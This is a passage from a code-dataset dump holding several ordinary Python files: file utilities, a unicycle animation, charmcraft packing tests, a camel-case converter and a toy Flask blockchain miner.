Python 3.6+\r\n:Developer: J Berendt\r\n:Email: development@s3dev.uk\r\n\r\n:Comments: n/a\r\n\r\n:Example:\r\n\r\n Example for comparing two files::\r\n\r\n >>> from utils4 import filesys\r\n\r\n >>> filesys.compare_files(file1='/path/to/file1.txt',\r\n file2='/path/to/file2.txt')\r\n True\r\n\r\n\r\n If the files are expected to have *different* line endings, yet the\r\n contents are otherwise expected to be the same, pass the ``contents_only``\r\n argument as ``True``; as this will skip the file signature test::\r\n\r\n >>> from utils4 import filesys\r\n\r\n >>> filesys.compare_files(file1='/path/to/file1.txt',\r\n file2='/path/to/file2.txt',\r\n contents_only=True)\r\n True\r\n\r\n\"\"\"\r\n# 
pylint: disable=invalid-name\r\n\r\nimport os\r\nimport shutil\r\nimport stat\r\nfrom glob import glob\r\nfrom utils4.reporterror import reporterror\r\ntry:\r\n from natsort import natsorted\r\n _IMP_NATSORT = True\r\nexcept ImportError:\r\n # Built-in sorting will be used instead.\r\n _IMP_NATSORT = False\r\n\r\n_SIZE = 16*1024 # 16 KiB\r\n\r\n\r\ndef compare_files(file1: str,\r\n file2: str,\r\n encoding: str='utf-8',\r\n contents_only: bool=False,\r\n sig_only: bool=False) -> bool:\r\n \"\"\"Test if two files are the same.\r\n\r\n This method is *modelled* after the built-in :func:`~filecmp.cmp` function,\r\n yet has been modified to *ignore* line endings. Meaning, if two files have\r\n the same signature and the contents are the same, except for the line\r\n endings, a result of True is returned.\r\n\r\n Args:\r\n file1 (str): Full path to a file to be tested.\r\n file2 (str): Full path to a file to be tested.\r\n encoding (str, optional): Encoding to be used when reading the files.\r\n Defaults to 'utf-8'.\r\n contents_only (bool, optional): Only compare the file contents, do not\r\n test the signatures. This is useful if the line endings are\r\n expected to be different, as a file with DOS line endings will be\r\n marginally larger than a file with UNIX line endings; meaning\r\n the file signature test will *fail*. Defaults to False.\r\n sig_only (bool, optional): Only compare the file signatures. The files'\r\n contents are *not* compared. Defaults to False.\r\n\r\n :Tests:\r\n If any of the following tests fail, a value of False is returned\r\n immediately, and no further tests are conducted.\r\n\r\n The following tests are conducted, given default function parameters:\r\n\r\n - Test both files are 'regular' files.\r\n - Test the files have the same size (in bytes), they are both regular\r\n files and their inode mode is the same.\r\n - Test the contents are the same; ignoring line endings.\r\n\r\n Returns:\r\n bool: True if *all* tests pass, indicating the files are the same;\r\n otherwise False.\r\n\r\n \"\"\"\r\n if contents_only:\r\n return _compare_content(file1=file1, file2=file2, encoding=encoding)\r\n sig1 = _sig(file1)\r\n sig2 = _sig(file2)\r\n if sig1[1] != stat.S_IFREG | sig2[1] != stat.S_IFREG:\r\n return False\r\n if sig_only:\r\n # Only compare signatures.\r\n return sig1 == sig2\r\n if sig1 != sig2:\r\n # Shortcut to bypass file content compare.\r\n return False\r\n return _compare_content(file1=file1, file2=file2, encoding=encoding)\r\n\r\ndef dirsplit(path: str,\r\n nfiles: int,\r\n pattern: str='*',\r\n pairs: bool=False,\r\n repl: tuple=(None,)) -> bool:\r\n \"\"\"Move all files from a single directory into (n) sub-directories.\r\n\r\n Args:\r\n path (str): Full path to the source files. Additionally, all files\r\n will be moved into sub-directories in this path.\r\n nfiles (int): Number of source files to be moved into each directory.\r\n pattern (str, optional): A shell-style wildcard pattern used for\r\n collecting the source files. For example: ``*.csv``.\r\n Defaults to '*'.\r\n pairs (bool, optional): Are the files in paris?. If True, the ``repl``\r\n argument is used to replace a substring of the source file with\r\n that of the paired file, so each file pair is moved into the same\r\n directory. Defaults to False.\r\n repl (tuple, optional): A tuple containing the old and new replacement\r\n strings. This argument is only in effect if the ``pairs`` argument\r\n is True. 
Defaults to (None,).\r\n\r\n For example::\r\n\r\n ('_input.csv', '_output.txt')\r\n\r\n Raises:\r\n FileNotFoundError: If the input file path does not exist.\r\n\r\n Returns:\r\n bool: True if the operation completes, otherwise False.\r\n\r\n \"\"\"\r\n if not os.path.exists(path):\r\n raise FileNotFoundError('The requested path does not exist.')\r\n success = False\r\n try:\r\n # Setup.\r\n files = [f for f in glob(os.path.join(path, pattern)) if os.path.isfile(f)]\r\n files = natsorted(files) if _IMP_NATSORT else sorted(files)\r\n total = len(files)\r\n i = nfiles\r\n dirnum = 0\r\n # File iterator.\r\n for idx, file in enumerate(files, 1):\r\n # Define the (next) copy-to directory and create it.\r\n if i >= nfiles:\r\n i = 0\r\n dirnum += 1\r\n dirnam = str(dirnum).zfill(2)\r\n dirpath = os.path.join(path, dirnam)\r\n if not os.path.exists(dirpath):\r\n os.mkdir(path=dirpath)\r\n # Copy source file.\r\n base = os.path.basename(file)\r\n dst = os.path.join(path, dirnam, base)\r\n print(f'Moving {idx} of {total}: {base} -> {dirnam}')\r\n shutil.move(src=file, dst=dst)\r\n _file_move_test(fpath=dst)\r\n if pairs:\r\n # Copy paired file.\r\n base2 = base.replace(*repl)\r\n dst2 = os.path.join(path, dirnam, base2)\r\n print(rf'\\t\\-- {base2} -> {dirnam}')\r\n shutil.move(src=os.path.join(path, base2), dst=dst2)\r\n _file_move_test(fpath=dst2)\r\n i += 1\r\n success = True\r\n except FileNotFoundError as ferr: # progma nocover (cannot test)\r\n # Designed to catch / print file move errors from _file_move_test().\r\n print(ferr)\r\n except Exception as err:\r\n reporterror(err)\r\n return success\r\n\r\ndef _compare_content(file1: str, file2: str, encoding: str='utf-8') -> bool:\r\n \"\"\"Compare the content of each file.\r\n\r\n Args:\r\n file1 (str): Full path to a file to be tested.\r\n file2 (str): Full path to a file to be tested.\r\n encoding (str, optional): Encoding to be used when reading the files.\r\n Defaults to 'utf-8'.\r\n\r\n This function short-circuits once a difference is found and immediately\r\n returns False.\r\n\r\n Returns:\r\n bool: True if the file contents are the same, otherwise False.\r\n\r\n \"\"\"\r\n with open(file1, 'r', encoding=encoding) as f1, open(file2, 'r', encoding=encoding) as f2:\r\n while True:\r\n data1 = f1.read(_SIZE)\r\n data2 = f2.read(_SIZE)\r\n if data1 != data2:\r\n return False\r\n # Both files have reached EOF and are the same.\r\n if not data1 and not data2:\r\n return True\r\n\r\ndef _file_move_test(fpath: str) -> bool:\r\n \"\"\"Test a file exists.\r\n\r\n This method is used to verify the subject file was moved successfully.\r\n\r\n Args:\r\n fpath (str): File path to be tested.\r\n\r\n Raises:\r\n FileNotFoundError: If the subject file does not exist.\r\n\r\n Returns:\r\n bool: True if the file was moved successfully, otherwise False.\r\n\r\n \"\"\"\r\n if not os.path.exists(fpath):\r\n msg = ('\\nThe following file was not copied successfully. 
Processing aborted.\\n'\r\n f'-- {fpath}\\n')\r\n raise FileNotFoundError(msg)\r\n return True\r\n\r\ndef _sig(file: str) -> tuple:\r\n \"\"\"Build a tuple containing elements of a file's signature.\r\n\r\n Args:\r\n file (str): Full path to the file to be tested.\r\n\r\n Returns:\r\n tuple: A tuple containing elements of the file's signature, as::\r\n\r\n (file size, file type, inode mode)\r\n\r\n \"\"\"\r\n st = os.stat(file)\r\n return (st.st_size, stat.S_IFMT(st.st_mode), st.st_mode)\r\n","repo_name":"S3DEV/utils4","sub_path":"utils4/filesys.py","file_name":"filesys.py","file_ext":"py","file_size_in_byte":8692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22873377978","text":"import numpy as np \nfrom unicycle import Unicycle\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FFMpegWriter\n\nmetadata = dict(title = 'Movie Test', artist = \"Matplotlib\", comment = \"Movie support!\")\nwriter = FFMpegWriter(fps=15, metadata = metadata)\n\n\nplt.ion()\nfig = plt.figure()\nax = plt.axes(xlim = (0,7), ylim = (-0.5,8))\n\nrobot = Unicycle(np.array([0,0,0]).reshape(-1,1), 0.01, ax)\n\nwith writer.saving(fig, 'test.mp4', 100):\n\n\tfor i in range(1000):\n\t\tv = 1.0\n\t\tw = np.pi/6\n\t\tu = np.array([v,w]).reshape(-1,1)\n\t\trobot.step(u)\n\t\trobot.render_plot()\n\t\t\n\t\tfig.canvas.draw()\n\t\tfig.canvas.flush_events()\n\t\n\t\twriter.grab_frame()\n\n\n\nplt.ioff() \nprint(\"DONE!\")","repo_name":"n-campbell/ROB590","sub_path":"unicycle_main.py","file_name":"unicycle_main.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7489827506","text":"import datetime\nimport logging\nimport pathlib\nimport zipfile\nfrom argparse import ArgumentParser, Namespace\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nimport yaml\n\nfrom charmcraft.cmdbase import CommandError\nfrom charmcraft.commands import pack\nfrom charmcraft.commands.pack import PackCommand, build_zip\nfrom charmcraft.config import Project\nfrom charmcraft.utils import SingleOptionEnsurer, useful_filepath\n\n# empty namespace\nnoargs = Namespace(\n entrypoint=None,\n requirement=None,\n bases_index=[],\n destructive_mode=False,\n force=None,\n)\n\n\n@pytest.fixture\ndef bundle_yaml(tmp_path):\n \"\"\"Create an empty bundle.yaml, with the option to set values to it.\"\"\"\n bundle_path = tmp_path / \"bundle.yaml\"\n bundle_path.write_text(\"{}\")\n content = {}\n\n def func(*, name):\n content[\"name\"] = name\n encoded = yaml.dump(content)\n bundle_path.write_text(encoded)\n return encoded\n\n return func\n\n\n# -- tests for the project type decissor\n\n\ndef test_resolve_charm_type(config):\n \"\"\"The config indicates the project is a charm.\"\"\"\n config.set(type=\"charm\")\n cmd = PackCommand(\"group\", config)\n\n with patch.object(cmd, \"_pack_charm\") as mock:\n cmd.run(noargs)\n mock.assert_called_with(noargs)\n\n\ndef test_resolve_bundle_type(config):\n \"\"\"The config indicates the project is a bundle.\"\"\"\n config.set(type=\"bundle\")\n cmd = PackCommand(\"group\", config)\n\n with patch.object(cmd, \"_pack_bundle\") as mock:\n cmd.run(noargs)\n mock.assert_called_with()\n\n\ndef test_resolve_no_config_packs_charm(config, tmp_path):\n \"\"\"There is no config, so it's decided to pack a charm.\"\"\"\n config.set(\n project=Project(\n config_provided=False,\n dirpath=tmp_path,\n started_at=datetime.datetime.utcnow(),\n )\n )\n 
cmd = PackCommand(\"group\", config)\n\n    with patch.object(cmd, \"_pack_charm\") as mock:\n        cmd.run(noargs)\n    mock.assert_called_with(noargs)\n\n\ndef test_resolve_bundle_with_requirement(config):\n    \"\"\"The requirement option is not valid when packing a bundle.\"\"\"\n    config.set(type=\"bundle\")\n    args = Namespace(requirement=\"reqs.txt\", entrypoint=None)\n\n    with pytest.raises(CommandError) as cm:\n        PackCommand(\"group\", config).run(args)\n    assert str(cm.value) == \"The -r/--requirement option is valid only when packing a charm\"\n\n\ndef test_resolve_bundle_with_entrypoint(config):\n    \"\"\"The entrypoint option is not valid when packing a bundle.\"\"\"\n    config.set(type=\"bundle\")\n    args = Namespace(requirement=None, entrypoint=\"mycharm.py\")\n\n    with pytest.raises(CommandError) as cm:\n        PackCommand(\"group\", config).run(args)\n    assert str(cm.value) == \"The -e/--entry option is valid only when packing a charm\"\n\n\n# -- tests for main bundle building process\n\n\ndef test_bundle_simple_succesful_build(tmp_path, caplog, bundle_yaml, bundle_config):\n    \"\"\"A simple happy story.\"\"\"\n    caplog.set_level(logging.INFO, logger=\"charmcraft.commands\")\n\n    # mandatory files (other than the automatically provided manifest)\n    content = bundle_yaml(name=\"testbundle\")\n    bundle_config.set(type=\"bundle\")\n    (tmp_path / \"README.md\").write_text(\"test readme\")\n\n    # build!\n    PackCommand(\"group\", bundle_config).run(noargs)\n\n    # check\n    zipname = tmp_path / \"testbundle.zip\"\n    zf = zipfile.ZipFile(zipname)\n    assert \"charmcraft.yaml\" not in [x.filename for x in zf.infolist()]\n    assert zf.read(\"bundle.yaml\") == content.encode(\"ascii\")\n    assert zf.read(\"README.md\") == b\"test readme\"\n\n    expected = \"Created '{}'.\".format(zipname)\n    assert [expected] == [rec.message for rec in caplog.records]\n\n    # check the manifest is present and with particular values that depend on given info\n    manifest = yaml.safe_load(zf.read(\"manifest.yaml\"))\n    assert manifest[\"charmcraft-started-at\"] == bundle_config.project.started_at.isoformat() + \"Z\"\n\n    # verify that the manifest was not leftover in user's project\n    assert not (tmp_path / \"manifest.yaml\").exists()\n\n\ndef test_bundle_missing_bundle_file(tmp_path, bundle_config):\n    \"\"\"Cannot build a bundle without bundle.yaml.\"\"\"\n    # build without a bundle.yaml!\n    with pytest.raises(CommandError) as cm:\n        PackCommand(\"group\", bundle_config).run(noargs)\n    assert str(cm.value) == (\n        \"Missing or invalid main bundle file: '{}'.\".format(tmp_path / \"bundle.yaml\")\n    )\n\n\ndef test_bundle_missing_other_mandatory_file(tmp_path, bundle_config, bundle_yaml):\n    \"\"\"Cannot build a bundle without any of the mandatory files.\"\"\"\n    bundle_yaml(name=\"testbundle\")\n    bundle_config.set(type=\"bundle\")\n\n    # build without a README!\n    with pytest.raises(CommandError) as cm:\n        PackCommand(\"group\", bundle_config).run(noargs)\n    assert str(cm.value) == \"Missing mandatory file: {!r}.\".format(str(tmp_path / \"README.md\"))\n\n\ndef test_bundle_missing_name_in_bundle(tmp_path, bundle_yaml, bundle_config):\n    \"\"\"Cannot build a bundle without name.\"\"\"\n    bundle_config.set(type=\"bundle\")\n\n    # build!\n    with pytest.raises(CommandError) as cm:\n        PackCommand(\"group\", bundle_config).run(noargs)\n    assert str(cm.value) == (\n        \"Invalid bundle config; \"\n        \"missing a 'name' field indicating the bundle's name in file '{}'.\".format(\n            tmp_path / \"bundle.yaml\"\n        )\n    )\n\n\n# -- tests for get paths helper\n\n\ndef 
test_prime_mandatory_ok(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Simple succesful case getting all mandatory files.\"\"\"\n bundle_yaml(name=\"testbundle\")\n test_mandatory = [\"foo.txt\", \"bar.bin\"]\n test_file1 = tmp_path / \"foo.txt\"\n test_file1.touch()\n test_file2 = tmp_path / \"bar.bin\"\n test_file2.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", test_mandatory):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"foo.txt\" in zipped_files\n assert \"bar.bin\" in zipped_files\n\n\ndef test_prime_extra_ok(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Extra files were indicated ok.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"f2.txt\", \"f1.txt\"])\n testfile1 = tmp_path / \"f1.txt\"\n testfile1.touch()\n testfile2 = tmp_path / \"f2.txt\"\n testfile2.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"f1.txt\" in zipped_files\n assert \"f2.txt\" in zipped_files\n\n\ndef test_prime_extra_missing(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Extra files were indicated but not found.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"f2.txt\", \"f1.txt\"])\n testfile1 = tmp_path / \"f1.txt\"\n testfile1.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n with pytest.raises(CommandError) as err:\n PackCommand(\"group\", bundle_config).run(noargs)\n assert str(err.value) == (\n \"Parts processing error: Failed to copy '{}/build/stage/f2.txt': \"\n \"no such file or directory.\".format(tmp_path)\n )\n\n\ndef test_prime_extra_long_path(tmp_path, bundle_yaml, bundle_config):\n \"\"\"An extra file can be deep in directories.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"foo/bar/baz/extra.txt\"])\n testfile = tmp_path / \"foo\" / \"bar\" / \"baz\" / \"extra.txt\"\n testfile.parent.mkdir(parents=True)\n testfile.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"foo/bar/baz/extra.txt\" in zipped_files\n\n\ndef test_prime_extra_wildcards_ok(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Use wildcards to specify several files ok.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"*.txt\"])\n testfile1 = tmp_path / \"f1.txt\"\n testfile1.touch()\n testfile2 = tmp_path / \"f2.bin\"\n testfile2.touch()\n testfile3 = tmp_path / \"f3.txt\"\n testfile3.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert \"f1.txt\" in zipped_files\n assert \"f2.bin\" not in zipped_files\n assert \"f3.txt\" in zipped_files\n\n\ndef test_prime_extra_wildcards_not_found(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Use wildcards to specify several files but nothing found.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"*.txt\"])\n\n # non-existent files are not included if using a wildcard\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / 
\"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n assert zipped_files == [\"manifest.yaml\"]\n\n\ndef test_prime_extra_globstar(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Double star means whatever directories are in the path.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"lib/**/*\"])\n srcpaths = (\n (\"lib/foo/f1.txt\", True),\n (\"lib/foo/deep/fx.txt\", True),\n (\"lib/bar/f2.txt\", True),\n (\"lib/f3.txt\", True),\n (\"extra/lib/f.txt\", False),\n (\"libs/fs.txt\", False),\n )\n\n for srcpath, expected in srcpaths:\n testfile = tmp_path / pathlib.Path(srcpath)\n testfile.parent.mkdir(parents=True, exist_ok=True)\n testfile.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n for srcpath, expected in srcpaths:\n assert (srcpath in zipped_files) == expected\n\n\ndef test_prime_extra_globstar_specific_files(tmp_path, bundle_yaml, bundle_config):\n \"\"\"Combination of both mechanisms.\"\"\"\n bundle_yaml(name=\"testbundle\")\n bundle_config.set(prime=[\"lib/**/*.txt\"])\n srcpaths = (\n (\"lib/foo/f1.txt\", True),\n (\"lib/foo/f1.nop\", False),\n (\"lib/foo/deep/fx.txt\", True),\n (\"lib/foo/deep/fx.nop\", False),\n (\"lib/bar/f2.txt\", True),\n (\"lib/bar/f2.nop\", False),\n (\"lib/f3.txt\", True),\n (\"lib/f3.nop\", False),\n (\"extra/lib/f.txt\", False),\n (\"libs/fs.nop\", False),\n )\n\n for srcpath, expected in srcpaths:\n testfile = tmp_path / pathlib.Path(srcpath)\n testfile.parent.mkdir(parents=True, exist_ok=True)\n testfile.touch()\n\n with patch.object(pack, \"MANDATORY_FILES\", []):\n PackCommand(\"group\", bundle_config).run(noargs)\n\n zf = zipfile.ZipFile(tmp_path / \"testbundle.zip\")\n zipped_files = [x.filename for x in zf.infolist()]\n for srcpath, expected in srcpaths:\n assert (srcpath in zipped_files) == expected\n\n\n# -- tests for zip builder\n\n\ndef test_zipbuild_simple(tmp_path):\n \"\"\"Build a bunch of files in the zip.\"\"\"\n build_dir = tmp_path / \"somedir\"\n build_dir.mkdir()\n\n testfile1 = build_dir / \"foo.txt\"\n testfile1.write_bytes(b\"123\\x00456\")\n subdir = build_dir / \"bar\"\n subdir.mkdir()\n testfile2 = subdir / \"baz.txt\"\n testfile2.write_bytes(b\"mo\\xc3\\xb1o\")\n\n zip_filepath = tmp_path / \"testresult.zip\"\n build_zip(zip_filepath, build_dir)\n\n zf = zipfile.ZipFile(zip_filepath)\n assert sorted(x.filename for x in zf.infolist()) == [\"bar/baz.txt\", \"foo.txt\"]\n assert zf.read(\"foo.txt\") == b\"123\\x00456\"\n assert zf.read(\"bar/baz.txt\") == b\"mo\\xc3\\xb1o\"\n\n\ndef test_zipbuild_symlink_simple(tmp_path):\n \"\"\"Symlinks are supported.\"\"\"\n build_dir = tmp_path / \"somedir\"\n build_dir.mkdir()\n\n testfile1 = build_dir / \"real.txt\"\n testfile1.write_bytes(b\"123\\x00456\")\n testfile2 = build_dir / \"link.txt\"\n testfile2.symlink_to(testfile1)\n\n zip_filepath = tmp_path / \"testresult.zip\"\n build_zip(zip_filepath, build_dir)\n\n zf = zipfile.ZipFile(zip_filepath)\n assert sorted(x.filename for x in zf.infolist()) == [\"link.txt\", \"real.txt\"]\n assert zf.read(\"real.txt\") == b\"123\\x00456\"\n assert zf.read(\"link.txt\") == b\"123\\x00456\"\n\n\ndef test_zipbuild_symlink_outside(tmp_path):\n \"\"\"No matter where the symlink points to.\"\"\"\n # outside the build dir\n testfile1 = tmp_path / \"real.txt\"\n testfile1.write_bytes(b\"123\\x00456\")\n\n # inside the build dir\n build_dir 
= tmp_path / \"somedir\"\n    build_dir.mkdir()\n    testfile2 = build_dir / \"link.txt\"\n    testfile2.symlink_to(testfile1)\n\n    zip_filepath = tmp_path / \"testresult.zip\"\n    build_zip(zip_filepath, build_dir)\n\n    zf = zipfile.ZipFile(zip_filepath)\n    assert sorted(x.filename for x in zf.infolist()) == [\"link.txt\"]\n    assert zf.read(\"link.txt\") == b\"123\\x00456\"\n\n\n# tests for the main charm building process -- so far this is only using the \"build\" command\n# infrastructure, until we migrate the (adapted) behaviour to this command\n\n\ndef test_charm_parameters_requirement(config):\n    \"\"\"The --requirement option implies a set of validations.\"\"\"\n    cmd = PackCommand(\"group\", config)\n    parser = ArgumentParser()\n    cmd.fill_parser(parser)\n    (action,) = [action for action in parser._actions if action.dest == \"requirement\"]\n    assert action.type is useful_filepath\n\n\ndef test_charm_parameters_entrypoint(config):\n    \"\"\"The --entrypoint option implies a set of validations.\"\"\"\n    cmd = PackCommand(\"group\", config)\n    parser = ArgumentParser()\n    cmd.fill_parser(parser)\n    (action,) = [action for action in parser._actions if action.dest == \"entrypoint\"]\n    assert isinstance(action.type, SingleOptionEnsurer)\n    assert action.type.converter is useful_filepath\n\n\ndef test_charm_parameters_validator(config, tmp_path):\n    \"\"\"Check that build.Validator is properly called.\"\"\"\n    args = Namespace(\n        destructive_mode=True,\n        requirement=\"test-reqs\",\n        entrypoint=\"test-epoint\",\n        bases_index=[],\n        force=True,\n    )\n    config.set(\n        type=\"charm\",\n        project=Project(dirpath=tmp_path, started_at=datetime.datetime.utcnow()),\n    )\n    with patch(\"charmcraft.commands.build.Validator\", autospec=True) as validator_class_mock:\n        validator_class_mock.return_value = validator_instance_mock = MagicMock()\n        with patch(\"charmcraft.commands.build.Builder\"):\n            PackCommand(\"group\", config).run(args)\n    validator_instance_mock.process.assert_called_with(\n        Namespace(\n            **{\n                \"destructive_mode\": True,\n                \"from\": tmp_path,\n                \"requirement\": \"test-reqs\",\n                \"entrypoint\": \"test-epoint\",\n                \"bases_indices\": [],\n                \"force\": True,\n            }\n        )\n    )\n\n\ndef test_charm_builder_infrastructure_called(config):\n    \"\"\"Check that build.Builder is properly called.\"\"\"\n    config.set(type=\"charm\")\n    with patch(\"charmcraft.commands.build.Validator\", autospec=True) as validator_mock:\n        validator_mock(config).process.return_value = \"processed args\"\n        with patch(\"charmcraft.commands.build.Builder\") as builder_class_mock:\n            builder_class_mock.return_value = builder_instance_mock = MagicMock()\n            PackCommand(\"group\", config).run(noargs)\n    builder_class_mock.assert_called_with(\"processed args\", config)\n    builder_instance_mock.run.assert_called_with([], destructive_mode=False)\n","repo_name":"heitorPB/charmcraft","sub_path":"tests/commands/test_pack.py","file_name":"test_pack.py","file_ext":"py","file_size_in_byte":15580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18862101156","text":"import re\n\ndef capitalize(word):\n    return word[0:1].upper() + word[1:].lower()\n\ndef lowercase(word):\n    return word.lower()\n\n\ndef camel_case(sentence):\n\n    remove_multiple_spaces = re.sub(r'\\s+', ' ', sentence) \n    remove_surrounding_space = remove_multiple_spaces.strip() \n    words = remove_surrounding_space.split(' ') \n    first_word = lowercase(words[0]) \n    capitalized_words = [ capitalize(word) for word in words[ 1: ] ]\n    camel_cased_words = [first_word] + 
capitalized_words\n    camel_cased_sentence = ''.join(camel_cased_words)\n    return camel_cased_sentence\n\ndef main():\n    sentence = input('Enter your sentence: ')\n    camelcased = camel_case(sentence)\n    print(camelcased)\n\nif __name__ == '__main__':\n    main()","repo_name":"jx4515ga/Lab-4-Part1","sub_path":"CamelCase.py","file_name":"CamelCase.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8635939725","text":"## import sha256 library, json, flask and time\r\nfrom hashlib import sha256\r\nfrom flask import Flask, request\r\nimport requests\r\nimport json\r\nimport time\r\n\r\n## Create random strings to fill transactions\r\nimport random\r\nimport string\r\n\r\nclass Block:\r\n    \"\"\"\r\n    Represents a single Block object\r\n    \"\"\"\r\n    def __init__(self, index, transactions, timestamp, previous_hash, nonce = 0):\r\n        self.index = index\r\n        self.transactions = transactions\r\n        self.timestamp = timestamp\r\n        self.previous_hash = previous_hash\r\n        self.nonce = nonce\r\n    \r\n    def calculate_hash(self):\r\n        \"\"\"\r\n        Return the hash of the block contents\r\n        \"\"\"\r\n        block_data = json.dumps(self.__dict__, sort_keys=True)\r\n        return sha256(block_data.encode()).hexdigest()\r\n\r\n\r\nclass Blockchain:\r\n    \"\"\"\r\n    Represents a blockchain\r\n    \"\"\"\r\n    # Difficulty of PoW (set to 5 for the best effect)\r\n    difficulty = 5\r\n\r\n    def __init__(self):\r\n        \"\"\"\r\n        Build the Blockchain with an empty chain/list of unconfirmed transactions.\r\n        Create the first block by calling create_genesis_block\r\n        \"\"\"\r\n        self.unconfirmed_transactions = []\r\n        self.chain = []\r\n        self.create_genesis_block()\r\n\r\n    def create_genesis_block(self):\r\n        \"\"\"\r\n        Generate the genesis block/first block of the blockchain\r\n        \"\"\"\r\n        genesis_block = Block(0, [], time.time(), \"0\")\r\n        genesis_block.hash = genesis_block.calculate_hash()\r\n        self.chain.append(genesis_block)\r\n    \r\n    @property\r\n    def last_block(self):\r\n        return self.chain[-1]\r\n    \r\n    def proof_of_work(self, block):\r\n        \"\"\"\r\n        Simulate the proof of work process by generating a hash that starts with the correct amount of 0's\r\n        \"\"\"\r\n        block.nonce = 0\r\n        calculated_hash = block.calculate_hash()\r\n        \r\n        while not calculated_hash.startswith('0' * Blockchain.difficulty):\r\n            block.nonce += 1\r\n            calculated_hash = block.calculate_hash()\r\n            print(calculated_hash)\r\n        return calculated_hash\r\n\r\n    def add_block(self, block, proof):\r\n        previous_hash = self.last_block.hash\r\n        if previous_hash != block.previous_hash:\r\n            return False\r\n        if not self.is_valid_proof(block, proof):\r\n            return False\r\n        block.hash = proof\r\n        self.chain.append(block)\r\n        return True\r\n    \r\n    def is_valid_proof(self, block, block_hash):\r\n        return (block_hash.startswith('0' * Blockchain.difficulty) and\r\n                block_hash == block.calculate_hash())\r\n    \r\n    def add_new_transaction(self, transaction):\r\n        self.unconfirmed_transactions.append(transaction)\r\n    \r\n    def mine(self):\r\n        ## If there are no unconfirmed transactions, do nothing.\r\n        if not self.unconfirmed_transactions:\r\n            return False\r\n        \r\n        last_block = self.last_block\r\n\r\n        ## Create a new Block Object\r\n        new_block = Block(index=last_block.index + 1, \r\n                          transactions=self.unconfirmed_transactions,\r\n                          timestamp=time.time(),\r\n                          previous_hash=last_block.hash)\r\n        \r\n        ## Generate the PoW\r\n        proof = self.proof_of_work(new_block)\r\n\r\n        ## Add the new block (the proof is also checked here before 
the Block is added to the Blockchain)\r\n self.add_block(new_block, proof)\r\n self.unconfirmed_transactions = []\r\n return new_block.index\r\n\r\n\r\n\"\"\"\r\nThe below starts flask and enables you to start the blockchain and mine new blocks:\r\n1. Start the .py file in command prompt \"python Block.py\".\r\n2. Open a seperate cmd prompt window and run \"curl http://127.0.0.1:5000/chain\" to start a new Blockchain.\r\n3. Then, run the command \"curl http://127.0.0.1:5000/mine\" to mine a new block.\r\n\"\"\"\r\n\r\napp = Flask(__name__)\r\nblockchain = Blockchain()\r\n@app.route('/chain', methods=['GET'])\r\ndef get_chain():\r\n chain_data = []\r\n for block in blockchain.chain:\r\n chain_data.append(block.__dict__)\r\n return json.dumps({\"length\": len(chain_data),\r\n \"chain\": chain_data})\r\n\r\n@app.route('/mine', methods=['GET'])\r\ndef mine_a_block():\r\n letters = string.ascii_lowercase\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n random_string = ''.join(random.choice(letters) for i in range(10))\r\n blockchain.add_new_transaction(random_string)\r\n blockchain.mine()\r\n chain_data = []\r\n for block in blockchain.chain:\r\n chain_data.append(block.__dict__)\r\n return json.dumps({\"length\": len(chain_data),\r\n \"chain\": chain_data[-1]})\r\n \r\n\r\napp.run(debug=True, port=5000)","repo_name":"mattycoles/Python_Blockchain","sub_path":"Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 